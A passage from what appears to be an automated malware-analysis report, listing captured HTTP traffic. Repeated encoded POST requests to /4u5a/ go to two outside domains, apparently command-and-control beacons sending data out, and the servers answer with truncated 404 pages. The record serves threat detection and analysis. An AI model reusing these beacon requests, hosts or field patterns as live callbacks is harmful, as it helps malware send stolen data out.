74 77 4b 51 70 39 35 68 6e 76 73 72 64 52 66 4c 77 63 57 41 30 35 34 33 4c 37 41 71 5a 32 49 78 4f 2d 37 41 34 4f 68 46 70 66 42 71 56 56 62 2d 6d 53 32 64 33 31 39 58 33 38 49 76 7a 6d 75 65 65 46 49 62 52 50 34 45 73 67 6e 39 50 44 5
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.marketmall.digitalConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.marketmall.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.marketmall.digital/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 7a 31 79 56 7e 64 7e 46 47 6a 30 33 56 72 6c 6a 58 30 75 59 78 51 47 67 68 65 38 55 35 62 35 6e 4e 78 7e 50 47 6e 53 62 67 63 4c 57 44 4f 6f 73 68 59 53 37 67 35 48 6a 4f 35 76 6e 77 32 67 62 70 43 31 7a 58 50 49 72 4a 49 57 52 74 4a 44 68 34 72 56 4b 53 6a 75 55 78 6f 28 45 50 48 7e 52 4b 65 65 34 77 4b 44 37 77 6a 33 78 69 31 6b 4e 63 66 4c 72 68 63 65 44 74 72 37 36 57 31 61 6b 4c 31 77 67 37 77 6f 4f 61 58 46 57 6a 6b 36 73 64 2d 36 45 39 32 43 49 42 2d 4d 77 72 2d 53 36 76 4e 76 6c 76 4b 51 77 53 78 52 44 45 76 45 39 4a 57 46 32 61 36 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=z1yV~d~FGj03VrljX0uYxQGghe8U5b5nNx~PGnSbgcLWDOoshYS7g5HjO5vnw2gbpC1zXPIrJIWRtJDh4rVKSjuUxo(EPH~RKee4wKD7wj3xi1kNcfLrhceDtr76W1akL1wg7woOaXFWjk6sd-6E92CIB-Mwr-S6vNvlvKQwSxRDEvE9JWF2a6o.
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.marketmall.digitalConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.marketmall.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.marketmall.digital/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 7a 31 79 56 7e 64 7e 46 47 6a 30 33 55 4f 74 6a 62 33 57 59 6b 67 47 6a 74 2d 38 55 7a 37 35 6a 4e 78 69 50 47 69 72 65 68 76 6e 57 44 63 41 73 67 36 36 37 69 35 48 6a 49 35 76 6a 75 47 67 7a 70 43 68 56 58 4b 6b 37 4a 4b 61 52 75 71 37 68 7e 76 31 4a 5a 7a 75 57 6d 34 28 48 50 48 28 4a 4b 65 4f 38 77 4b 57 67 77 6a 28 78 69 48 4d 4e 4d 5f 4c 6f 38 73 65 44 74 72 36 6f 57 31 61 49 4c 78 63 6f 37 78 41 65 5a 6d 31 57 6a 41 75 73 62 70 57 62 37 32 43 4d 49 65 4e 46 67 2d 76 6c 6b 65 36 31 71 37 49 43 42 77 4a 41 49 38 35 35 5a 6c 51 31 50 50 70 6e 35 2d 78 33 31 46 53 32 64 63 4f 5a 7a 42 6d 74 56 6b 70 6d 50 67 4f 63 5a 75 7e 4a 58 6f 58 57 77 74 73 32 7e 73 37 53 69 66 7e 74 36 4a 42 4e 62 6b 65 6b 4f 6f 5a 61 55 55 71 54 71 66 70 68 54 32 63 50 65 4c 47 43 66 51 6c 77 65 7a 49 75 34 6f 66 50 50 79 65 48 5a 37 78 5a 42 46 67 30 65 2d 59 44 30 6d 54 5a 4f 54 50 68 42 32 33 78 71 48 34 4a 55 34 53 7a 42 7a 78 61 69 73 41 47 7a 6f 55 66 45 6a 28 52 6b 32 56 41 31 59 4b 52 32 56 7a 68 50 6a 6b 6b 74 43 44 72 78 4c 5a 32 76 78 7a 74 51 53 63 74 65 42 5a 45 57 59 6a 65 37 69 55 71 67 73 52 4d 42 51 7e 46 33 33 48 50 49 6b 32 38 6f 30 71 55 31 64 4c 54 69 6b 42 52 61 54 56 6c 36 74 35 48 39 77 54 59 71 59 74 38 65 69 46 6d 6a 33 75 41 4a 67 37 35 43 37 34 35 73 39 33 30 76 46 4b 51 5a 70 59 59 59 42 48 4c 30 65 46 34 52 44 36 51 55 65 75 33 38 79 50 32 6e 6a 45 74 48 51 47 33 76 56 77 77 7e 30 70 5f 6b 6f 55 58 65 54 52 62 47 55 55 54 64 70 53 47 58 4f 70 70 79 61 78 68 4d 58 4b 6c 61 65 77 4a 6b 68 7e 4d 56 70 50 4c 70 41 55 58 37 4b 6f 6b 75 31 47 65 32 42 48 52 39 5f 76 74 61 59 67 6b 65 74 28 5f 52 76 46 52 4d 52 70 64 62 4e 4a 57 47 70 61 6f 30 33 37 6e 79 43 64 57 4c 32 71 75 4b 30 79 4d 57 36 34 6f 61 42 6d 65 44 43 34 34 49 39 44 46 77 39 4f 6c 62 62 67 57 34 47 6d 2d 32 65 70 78 62 32 54 5a 4b 32 28 67 72 76 6e 30 68 48 31 69 6b 72 70 34 47 48 44 73 58 4d 57 52 31 68 68 57 32 55 7a 55 31 45 57 63 36 35 75 6c 70 36 32 4b 32 4f 75 7a 4b 4a 34 46 77 57 28 51 51 41 61 4f 7e 56 44 45 48 73 78 4a 34 43 6d 38 38 35 6a 64 72 4e 58 4c 6e 50 6f 46 31 33 52 5a 53 6b 33 62 51 4b 67 4e 64 4f 79 4c 35 71 53 49 6d 49 35 75 72 61 71 6d 5a 54 46 70 54 48 53 57 38 58 59 43 76 37 73 37 71 6a 31 37 75 75 30 75 79 70 38 49 58 6f 52 43 6d 36 28 6c 7a 4f 47 59 28 34 49 6a 6a 36 71 4b 52 5f 6f 51 74 66 33 41 6b 62 4a 33 77 6b 56 55 4f 6d 45 68 37 6f 57 48 33 61 78 73 55 31 47 64 37 46 73 39 68 45 56 33 63 54 32 33 36 75 41 53 37 5f 33 53 64 49 67 42 6c 6d 67 52 4b 46 63 42 28 76 79 73 53 33 6d 4f 7e 6c 57 6d 59 52 58 33 62 37 58 75 4a 48 71 6
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.canadianlocalbusiness.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.canadianlocalbusiness.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 43 62 77 37 51 6c 56 4d 46 5a 67 67 43 4f 73 59 4c 4b 6b 4a 51 47 58 76 58 46 49 49 45 70 38 35 54 65 6a 39 36 75 2d 35 6b 7a 72 58 62 7a 39 43 75 79 6b 45 4a 70 77 61 34 59 35 72 6b 73 4e 7e 48 38 6a 4f 42 62 58 62 58 4d 44 74 67 45 7a 58 30 33 41 6a 6e 59 52 62 30 55 76 54 4b 36 5a 37 31 59 51 6c 45 58 6e 69 51 49 45 74 64 51 5f 73 75 47 50 39 46 6f 4b 42 34 53 4e 61 56 4a 4d 71 6e 61 74 79 76 70 64 73 4f 76 33 6e 69 7a 51 64 33 34 76 68 6d 45 35 67 72 64 6c 36 2d 38 5a 7e 4f 73 6a 63 50 46 64 28 72 6f 58 46 43 34 31 55 52 49 6a 45 31 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lCbw7QlVMFZggCOsYLKkJQGXvXFIIEp85Tej96u-5kzrXbz9CuykEJpwa4Y5rksN~H8jOBbXbXMDtgEzX03AjnYRb0UvTK6Z71YQlEXniQIEtdQ_suGP9FoKB4SNaVJMqnatyvpdsOv3nizQd34vhmE5grdl6-8Z~OsjcPFd(roXFC41URIjE1s.
Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.canadianlocalbusiness.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.canadianlocalbusiness.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 43 62 77 37 51 6c 56 4d 46 5a 67 68 69 7e 73 64 6f 69 6b 65 41 47 59 6a 33 46 49 61 45 70 34 35 54 53 6a 39 37 71 75 35 57 28 72 58 4a 62 39 43 4d 71 6b 58 35 70 77 4c 6f 5a 77 6b 45 73 6c 7e 48 42 61 4f 41 72 48 62 55 67 44 73 43 73 7a 52 78 44 48 74 33 59 54 4b 6b 55 75 54 4b 37 44 37 31 49 55 6c 45 54 4a 69 51 67 45 74 6f 38 5f 71 65 47 4d 6a 56 6f 4b 42 34 53 5a 61 56 49 56 71 6e 44 72 79 75 78 4e 73 66 28 33 6e 41 37 51 62 51 73 73 78 6d 45 6c 7e 62 64 33 28 38 31 77 31 2d 34 6a 63 38 4a 45 76 61 4d 49 4e 51 73 34 43 51 70 69 56 68 47 67 4c 4f 35 46 54 58 64 6d 50 41 4e 64 50 56 42 47 72 79 61 46 4b 5a 50 56 4f 51 59 4e 53 30 43 45 36 67 67 2d 41 33 64 6f 73 49 79 6b 37 30 5a 50 37 6c 61 76 58 68 32 65 32 67 54 57 4a 4f 5a 53 73 74 53 49 6b 78 38 58 46 76 33 43 67 68 75 6d 59 5f 36 48 77 41 62 6e 4d 4d 51 4f 75 4a 48 5a 51 43 28 74 64 6f 4c 4d 41 57 5a 45 36 74 71 4f 74 79 4d 43 5a 71 72 46 50 30 4c 38 50 4e 42 56 6b 64 4b 44 45 62 72 58 68 36 30 76 56 73 75 66 6b 63 49 56 36 4d 74 58 74 62 4d 78 4d 54 6b 69 76 57 62 31 79 68 41 6c 50 33 66 30 6a 35 41 73 57 6c 4b 5a 68 30 6f 46 49 4a 47 5a 6f 48 53 31 76 44 48 44 50 66 74 37 64 6c 4a 79 71 78 78 5f 6a 6c 31 78 68 6b 35 64 57 33 79 33 34 4e 4d 46 42 75 5a 73 42 61 4e 78 32 39 67 41 6b 54 68 39 38 79 61 77 61 4f 63 61 31 46 5a 54 45 71 61 4b 7e 37 4b 47 54 78 37 4b 52 30 69 43 57 70 6a 47 5a 73 43 5a 28 46 4c 52 77 67 50 49 45 50 69 50 69 7a 68 62 57 6c 72 51 6c 4c 73 4a 49 4b 36 69 37 59 61 70 4d 53 47 48 69 4d 36 36 36 71 46 61 69 30 28 73 48 35 6b 74 6b 69 67 7a 6d 66 6f 54 54 74 67 7a 49 42 74 6d 7e 6c 69 33 31 70 77 46 30 79 75 4d 58 6c 4a 32 58 55 52 49 35 32 67 37 65 59 6d 49 34 79 53 38 36 56 36 49 38 39 59 6d 28 72 76 34 44 72 6f 55 30 68 38 6f 7e 6d 6d 44 67 74 6b 49 73 5a 46 41 36 61 30 35 59 67 4e 59 72 30 45 45 49 47 55 4b 65 4c 33 6d 41 4d 38 4e 6d 56 4a 48 70 35 32 4d 28 58 7a 57 53 6c 58 53 6e 69 41 36 46 55 71 45 63 43 72 56 7a 32 6a 65 47 78 46 43 47 44 37 55 76 6c 36 56 63 79 48 70 43 34 44 35 51 44 69 62 78 59 79 62 4c 6f 69 70 47 51 7e 6a 74 2d 32 73 74 64 41 59 32 57 47 61 28 5a 6e 36 51 6b 32 54 33 4e 37 4a 6f 39 28 75 30 31 48 39 78 74 54 75 72 48 28 67 6a 5a 68 32 54 67 61 51 6a 66 72 6a 4a 76 69 2d 7a 62 4c 33 51 55 42 57 74 69 4d 59 79 32 4f 4d 53 74 31 47 50 4d 7e 77 55 36 72 65 63 52 72 6d 70 4b 28 78 4e 55 6d 38 33 43 59 6d 43 52 44 51 50 73 38 39 46 58 62 56 48 7a 43 4f 59 6e 4d 52 56 57 6e 6f 4b 57 59 79 79 4b 5a 5f 4a 6c 61 35 44 70 6e 54 4f 41 7a 63 4b 4c 48 35 4f 4a 51 4c 4e 5f 50 5f 57 4c 28 5a 68 71 39 79 7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:25:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 29 Nov 2022 17:25:25 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:11:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:12:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:12:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:51 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:53 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:56 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 